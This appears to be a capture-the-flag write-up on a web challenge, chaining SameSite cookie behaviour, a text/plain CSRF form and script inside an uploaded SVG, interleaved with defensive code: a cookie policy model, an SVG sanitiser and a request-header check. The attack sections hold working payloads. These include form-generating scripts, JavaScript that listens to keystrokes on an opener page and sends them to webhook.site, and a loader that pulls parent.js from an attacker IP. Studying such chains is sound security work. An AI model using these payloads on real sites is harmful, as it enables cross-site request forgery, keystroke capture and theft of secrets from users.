SameSite=None: sent in all cross-origin requests; the cookie is treated like a normal (old) cookie.
SameSite=Lax: sent only with GET requests in top-level window navigations, such as an <a> tag or window.open().

SameSite=Strict: sent only when the user types the website in the URL bar and presses enter.

A cookie without a SameSite attribute is treated as Lax, meaning it is sent only in top-level window navigations and only with GET requests.

Chrome will make an exception for cookies set without a SameSite attribute less than 2 minutes ago. Such cookies will also be sent with non-idempotent (e.g. POST) top-level cross-site requests despite normal SameSite=Lax cookies requiring top-level cross-site requests to have a safe (e.g. GET) HTTP method.

If the cookie was set or changed within the last 2 minutes, the browser also sends it on POST requests: it behaves like None, but only for top-level window navigations. After 2 minutes it reverts to normal Lax behaviour.
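The rules above, expressed as a small policy model. This is an added example, not code from the original writeup: Cookie, Request, cookie_is_sent and scenarios are hypothetical names, the 2-minute "Lax-allowing-unsafe" window is the Chrome exception quoted above, and the model also encodes Chrome's requirement that SameSite=None cookies carry the Secure flag. It assumes that a same-site request always carries the cookie and that the only cross-site context in which Lax cookies travel is a top-level navigation.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

# Methods the Lax rule treats as "safe" (the safe methods of RFC 9110)
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}
# Chrome's "Lax-allowing-unsafe" grace period for cookies set without a SameSite attribute
LAX_ALLOWING_UNSAFE_WINDOW = timedelta(minutes=2)


@dataclass
class Cookie:
    name: str
    samesite: Optional[str]  # "None", "Lax", "Strict", or None when the attribute is absent
    set_at: datetime         # when the cookie was set or last changed
    secure: bool = True      # SameSite=None is only honoured together with Secure


@dataclass
class Request:
    method: str
    cross_site: bool            # the initiating site differs from the request's site
    top_level_navigation: bool  # navigating the top window (<a>, window.open, form submit), not a subresource/fetch


def cookie_is_sent(cookie: Cookie, req: Request, now: datetime) -> bool:
    """Return True if the browser attaches the cookie to this request, following the rules above."""
    if not req.cross_site:
        return True  # same-site requests always carry the cookie, whatever the attribute says
    mode = cookie.samesite
    if mode == "None":
        return cookie.secure  # cross-site always allowed, but only for Secure cookies
    if mode == "Strict":
        return False  # never attached to cross-site requests
    # mode == "Lax", or attribute absent (defaulted to Lax by the browser)
    if not req.top_level_navigation:
        return False  # subresources, fetch()/XHR, iframes: not sent
    if req.method in SAFE_METHODS:
        return True  # top-level GET navigation: sent
    # Lax-allowing-unsafe: only a defaulted cookie younger than 2 minutes rides along on a top-level POST
    return mode is None and (now - cookie.set_at) < LAX_ALLOWING_UNSAFE_WINDOW


def scenarios(now: Optional[datetime] = None) -> dict:
    """Evaluate the cases described in the text against a fixed (constructed) reference time."""
    now = now or datetime(2024, 1, 1, 12, 0, 0)
    fresh_default = Cookie("session", None, now - timedelta(seconds=30))
    old_default = Cookie("session", None, now - timedelta(minutes=5))
    lax = Cookie("session", "Lax", now - timedelta(seconds=30))
    strict = Cookie("session", "Strict", now - timedelta(seconds=30))
    none_secure = Cookie("session", "None", now - timedelta(seconds=30), secure=True)
    top_get = Request("GET", cross_site=True, top_level_navigation=True)
    top_post = Request("POST", cross_site=True, top_level_navigation=True)
    xhr_post = Request("POST", cross_site=True, top_level_navigation=False)
    return {
        "lax_top_level_get": cookie_is_sent(lax, top_get, now),                        # True
        "lax_fetch_post": cookie_is_sent(lax, xhr_post, now),                          # False
        "explicit_lax_top_level_post": cookie_is_sent(lax, top_post, now),             # False
        "fresh_default_top_level_post": cookie_is_sent(fresh_default, top_post, now),  # True (2-minute exception)
        "old_default_top_level_post": cookie_is_sent(old_default, top_post, now),      # False
        "strict_top_level_get": cookie_is_sent(strict, top_get, now),                  # False
        "none_secure_fetch_post": cookie_is_sent(none_secure, xhr_post, now),          # True
    }


if __name__ == "__main__":
    for case, sent in scenarios().items():
        print(f"{case}: {'sent' if sent else 'not sent'}")
```

The practical consequence for a defender is the "fresh_default" row: a session cookie that is set without an explicit SameSite attribute and then immediately targeted by a cross-site top-level POST is still attached, so the browser default is not a substitute for setting SameSite explicitly or for a CSRF token.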

An SVG file can carry JavaScript:

<!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN' 'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'>
<svg version='1.1' xmlns='http://www.w3.org/2000/svg'>
<circle cx='250' cy='250' r='50' fill='red' />
<script type='text/javascript'><![CDATA[alert(1)]]></script>
</svg>
// Fragment of the challenge's upload handler (earlier branches omitted)
else if (isValidSvg($content)) {
    $new_name = uniqid() . ".$ext";
    file_put_contents($new_name, $content);

    if ($_SERVER['HTTP_REFERER'] !== 'http://' . $_SERVER['HTTP_HOST'] . '/admin.php') {
        header("Location: /api/$new_name");
        die();
    } else die("/api/$new_name");
}

Note the redirect: when the Referer is not /admin.php, the response is a Location header pointing at /api/<new_name>, i.e. the freshly uploaded SVG.
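A defender-side check for the upload handler above, added here as an example. It is not the challenge's own isValidSvg (whose body the page does not show): it parses the file as XML and reports script elements, event-handler attributes and javascript:/data: links, so the SVG shown above would be rejected. The function names and the three sample SVGs are constructed for this example; for untrusted input in production the stdlib parser should be swapped for defusedxml's ElementTree, which blocks entity-expansion attacks.

```python
import re
import xml.etree.ElementTree as ET  # use defusedxml.ElementTree for untrusted uploads (entity expansion)

# Elements that execute script or embed foreign/active content inside an SVG (compared lowercased)
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# URL schemes that run code or smuggle a nested document when used in href
SCRIPT_SCHEMES = ("javascript:", "data:", "vbscript:")


def _local(name: str) -> str:
    """Strip an XML namespace prefix such as '{http://www.w3.org/2000/svg}script'."""
    return name.rsplit("}", 1)[-1]


def find_active_content(svg: bytes) -> list:
    """Return a list of findings; an empty list means no active content was detected."""
    findings = []
    try:
        root = ET.fromstring(svg)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if _local(root.tag).lower() != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for elem in root.iter():
        if not isinstance(elem.tag, str):
            continue  # comments / processing instructions, if the parser kept any
        tag = _local(elem.tag).lower()
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"active element <{tag}>")
        for attr, value in elem.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):
                findings.append(f"event handler attribute {name} on <{tag}>")
            elif name == "href":
                # browsers ignore whitespace/control characters before the scheme, so strip them first
                normalized = re.sub(r"[\s\x00-\x1f]", "", value).lower()
                if normalized.startswith(SCRIPT_SCHEMES):
                    findings.append(f"href on <{tag}> uses scheme {normalized.split(':', 1)[0]}:")
    return findings


def is_safe_svg(svg: bytes) -> bool:
    """Accept only well-formed SVG with no detected active content."""
    return not find_active_content(svg)


# Constructed samples: the page's SVG with a script element, one using an event handler
# and a javascript: link, and a plain drawing.
MALICIOUS_SVG = b"""<!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN' 'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'>
<svg version='1.1' xmlns='http://www.w3.org/2000/svg'>
<circle cx='250' cy='250' r='50' fill='red' />
<script type='text/javascript'><![CDATA[alert(1)]]></script>
</svg>"""
HANDLER_SVG = b"""<svg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'>
<a href=' javascript:alert(1)'><text x='10' y='20'>x</text></a></svg>"""
CLEAN_SVG = b"""<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'>
<circle cx='50' cy='50' r='40' fill='red'/></svg>"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SVG), ("handler", HANDLER_SVG), ("clean", CLEAN_SVG)):
        print(label, find_active_content(sample) or "no active content")
```

Detection alone is brittle, so it should be a second layer: the safer server-side pattern is to never serve user uploads from the application's origin as renderable documents, for example by sending them with Content-Disposition: attachment or from a separate cookie-less origin, so a script inside an SVG cannot run with the victim's session.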
Use enctype="text/plain" so the form body is sent as plain text that parses as JSON:

<form method="post" enctype="text/plain" action="http://app:80/api/file.php">
<textarea name='{"filename":"'>.svg","base64_content": "PCFET"}</textarea>
<input type="submit">
</form>

Create an HTML file (the script below generates it):

import base64
svg_data = base64.b64encode(r"""<!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN'
'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'>
<svg version='1.1' xmlns='http://www.w3.org/2000/svg'>
<circle cx='250' cy='250' r='50' fill='red' />
<script type='text/javascript'><![CDATA[
alert(1);
]]></script>
</svg>""".encode()).decode()
data = r'''<form method="post" enctype="text/plain" action="http://172.24.0.4/api/file.php">
<textarea name='{"filename":"'>.svg","base64_content": "'''+svg_data+r'''"}</textarea>
<input type="submit">
</form>
<script>document.forms[0].submit()</script>
'''
print(data)
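The text/plain form above works because the endpoint accepts any body that parses as JSON. The check below is an added example, not the challenge's code, of what the server could require instead: a real application/json Content-Type, which an HTML form cannot produce, plus the browser-supplied Origin and Sec-Fetch-Site headers. check_json_request and _header are hypothetical names, the header dictionaries and the http://other.example origin are constructed, and http://app is the application origin used on this page.

```python
from typing import Mapping, Tuple

ALLOWED_CONTENT_TYPE = "application/json"


def _header(headers: Mapping[str, str], name: str) -> str:
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return ""


def check_json_request(headers: Mapping[str, str], site_origin: str) -> Tuple[bool, str]:
    """Decide whether a state-changing JSON request may be processed.

    site_origin is the application's own origin, e.g. 'http://app'.
    Returns (allowed, reason).
    """
    media_type = _header(headers, "Content-Type").split(";", 1)[0].strip().lower()
    if media_type != ALLOWED_CONTENT_TYPE:
        # A plain HTML <form> can only produce urlencoded, multipart or text/plain bodies;
        # a cross-origin fetch() sending application/json would first need a CORS preflight.
        return False, f"unexpected Content-Type {media_type or '(missing)'}"
    fetch_site = _header(headers, "Sec-Fetch-Site").lower()
    if fetch_site == "cross-site":
        return False, "Sec-Fetch-Site: cross-site"
    origin = _header(headers, "Origin")
    if origin and origin.lower() != site_origin.lower():
        # covers a mismatching origin as well as the literal "null" origin
        return False, f"Origin {origin} does not match {site_origin}"
    return True, "ok"


# Constructed header sets: what the text/plain form submission above would carry,
# a legitimate same-origin JSON call, and a JSON body from another origin.
FORGED_FORM_HEADERS = {
    "Content-Type": "text/plain",
    "Origin": "http://other.example",
    "Sec-Fetch-Site": "cross-site",
}
LEGIT_HEADERS = {
    "content-type": "application/json; charset=utf-8",
    "Origin": "http://app",
    "Sec-Fetch-Site": "same-origin",
}
CROSS_ORIGIN_JSON_HEADERS = {
    "Content-Type": "application/json",
    "Origin": "http://other.example",
}

if __name__ == "__main__":
    for label, hdrs in (("forged form", FORGED_FORM_HEADERS), ("legit", LEGIT_HEADERS),
                        ("cross-origin json", CROSS_ORIGIN_JSON_HEADERS)):
        print(label, check_json_request(hdrs, "http://app"))
```

The Content-Type check is the one that defeats the form trick directly; the Origin and Sec-Fetch-Site checks catch non-form cross-site requests. Old clients may send neither header, so this is defence in depth alongside a per-session CSRF token rather than a replacement for one.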

Replace the JS in the SVG with:

var isOpened = false;
fetch('https://webhook.site/XXXX?x=1');
function fun() {
    if (window.opener.document.getElementById('confirm_code') && !isOpened) {
        fetch('https://webhook.site/XXXX?x=2');
        console.log(window.opener.location.href);
        isOpened = true;
        function inputCallback(event) {
            console.log("User typed:", event.target.value);
            if (event.target.value.endsWith('}'))
                fetch('https://webhook.site/XXXX?s=' + escape(event.target.value));
        }
        console.log(window.opener.document.getElementById('confirm_code'));
        window.opener.document.getElementById('confirm_code').addEventListener('input', inputCallback);
    }
}
setInterval(fun, 1);

Get the flag.

Alternatively:

import base64
svg_data = base64.b64encode(r"""<!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN'
'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'>
<svg version='1.1' xmlns='http://www.w3.org/2000/svg'>
<circle cx='250' cy='250' r='50' fill='red' />
<script type='text/javascript'><![CDATA[
w = window.open();
w.document.write('<script src="http://X.X.X.X:8000/parent.js"></script>')
w.document.close()
]]></script>
</svg>""".encode()).decode()
data = r'''<form method="post" enctype="text/plain" action="http://app:80/api/file.php">
<textarea name='{"filename":"'>.svg","base64_content": "'''+svg_data+r'''"}</textarea>
<input type="submit">
</form>
<script>document.forms[0].submit()</script>
'''
print(data)